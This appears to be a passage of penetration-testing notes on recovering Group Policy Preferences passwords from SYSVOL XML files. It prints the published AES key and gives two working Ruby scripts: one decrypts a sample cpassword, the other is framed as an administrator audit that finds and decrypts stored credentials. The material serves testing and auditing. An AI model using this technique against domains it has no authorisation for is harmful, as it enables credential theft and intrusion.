- To reach the SYSVOL folder: Run > `%Logonserver%`
- Under that share, open `SYSVOL\<DOMAIN>\Policies\`
- Search for the XML, VBS or batch files that are used to set or change passwords: search by file type (`*.xml`, `*.vbs`, `*.bat`, etc.) combined with specific keywords until the password reset script is found.
- Files to look at and the settings they carry:
  - Map drives (Drives.xml)
  - Create local users (unattend.xml)
  - Data sources (DataSources.xml)
  - Printer configuration (Printers.xml)
  - Create/update services (Services.xml)
  - Scheduled tasks (ScheduledTasks.xml)
  - Change local Administrator passwords
  - Group Policy Preferences (Groups.xml)
These XML files can be found in the SYSVOL folder with a keyword search. Stored passwords are held in the `cpassword` attribute. The value is encrypted with AES-256 (32-byte key) and, as per Microsoft's documentation, the key is:

4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8
f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b

AES key source: https://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be.aspx
With access to this XML file, an attacker can use the published AES key (a symmetric key, the same for every domain) to decrypt the GPP password. The PowerSploit function Get-GPPPassword is the most useful tool for Group Policy Preference exploitation:
https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1
```ruby
require 'openssl'
require 'base64'

# Sample cpassword value as it appears in a Groups.xml
encrypted_data = "j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"

def decrypt(encrypted_data)
  # GPP strips the base64 padding; restore it (none when the length is already a multiple of 4)
  padding = "=" * ((4 - (encrypted_data.length % 4)) % 4)
  epassword = "#{encrypted_data}#{padding}"
  decoded = Base64.decode64(epassword)
  # Published 32-byte AES key from the Microsoft documentation linked above
  key = "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b"
  aes = OpenSSL::Cipher.new("AES-256-CBC") # OpenSSL::Cipher::Cipher.new is deprecated
  aes.decrypt
  aes.key = key
  aes.iv = "\x00" * 16 # GPP uses an all-zero IV; set it explicitly instead of relying on the default
  plaintext = aes.update(decoded)
  plaintext << aes.final
  # The plaintext is UTF-16LE; convert it properly instead of dropping the high byte of each code unit
  plaintext.force_encoding("UTF-16LE").encode("UTF-8")
end

puts decrypt(encrypted_data)
```
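As an added example (not code from this page or from PowerSploit), the Ruby script below turns the steps above into a SYSVOL audit: it scans GPP XML files for `cpassword` attributes, skips the empty `cpassword=""` that GPP writes when no password is stored, and decrypts each hit with the published key so an administrator can see which policies still carry credentials. The sample file contents and the `audit_sysvol` / `find_cpasswords` names are constructed for the example; the Groups.xml value is the sample shown on this page.

```ruby
require 'openssl'
require 'base64'
# Published MS14-025 GPP key (the hex value listed on this page).
GPP_AES_KEY = ['4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'].pack('H*').freeze

# Decrypt one cpassword: restore the stripped base64 padding, AES-256-CBC with
# the published key and an all-zero IV, then decode the UTF-16LE plaintext.
def decrypt_cpassword(cpassword)
  padded = cpassword + '=' * ((4 - cpassword.length % 4) % 4)
  cipher = OpenSSL::Cipher.new('AES-256-CBC')
  cipher.decrypt
  cipher.key = GPP_AES_KEY
  cipher.iv = "\x00" * 16
  plain = cipher.update(Base64.strict_decode64(padded)) + cipher.final
  plain.force_encoding('UTF-16LE').encode('UTF-8')
end

# Report every element in one GPP XML document that carries a non-empty
# cpassword. GPP writes flat <Properties .../> elements, so a tag-level
# attribute scan is enough; an empty cpassword="" (no stored password) is skipped.
def find_cpasswords(file_name, xml)
  xml.scan(%r{<(\w+)\b([^>]*\bcpassword="[^"]+"[^>]*)/?>}).map do |tag, attrs|
    a = attrs.scan(/([\w:]+)="([^"]*)"/).to_h
    { file: file_name, element: tag,
      account: a['userName'] || a['runAs'] || a['accountName'],
      password: decrypt_cpassword(a['cpassword']) }
  end
end
def audit_sysvol(files)
  files.flat_map { |name, xml| find_cpasswords(name, xml) }
end

# Constructed sample files, not real SYSVOL content. The Groups.xml cpassword is
# the sample value shown on this page; Drives.xml shows the empty-cpassword case.
SAMPLE_SYSVOL = {
  'Groups.xml' => '<Groups><User name="Administrator (built-in)"><Properties action="U" ' \
    'cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw" changeLogon="0" ' \
    'noChange="1" neverExpires="1" userName="Administrator (built-in)"/></User></Groups>',
  'Drives.xml' => '<Drives><Drive name="H:"><Properties action="U" path="\\\\fs01\\share" ' \
    'letter="H" userName="" cpassword=""/></Drive></Drives>',
  'Printers.xml' => '<Printers><SharedPrinter name="P1"><Properties path="\\\\ps01\\p1"/></SharedPrinter></Printers>'
}.freeze

if __FILE__ == $0
  audit_sysvol(SAMPLE_SYSVOL).each do |f|
    puts "#{f[:file]}: <#{f[:element]}> account=#{f[:account].inspect} password=#{f[:password].inspect}"
  end
end
```

On a real domain controller the same functions can be fed the files under `SYSVOL\<DOMAIN>\Policies\` with `Dir.glob`; any finding means the policy should be removed and the account's password rotated.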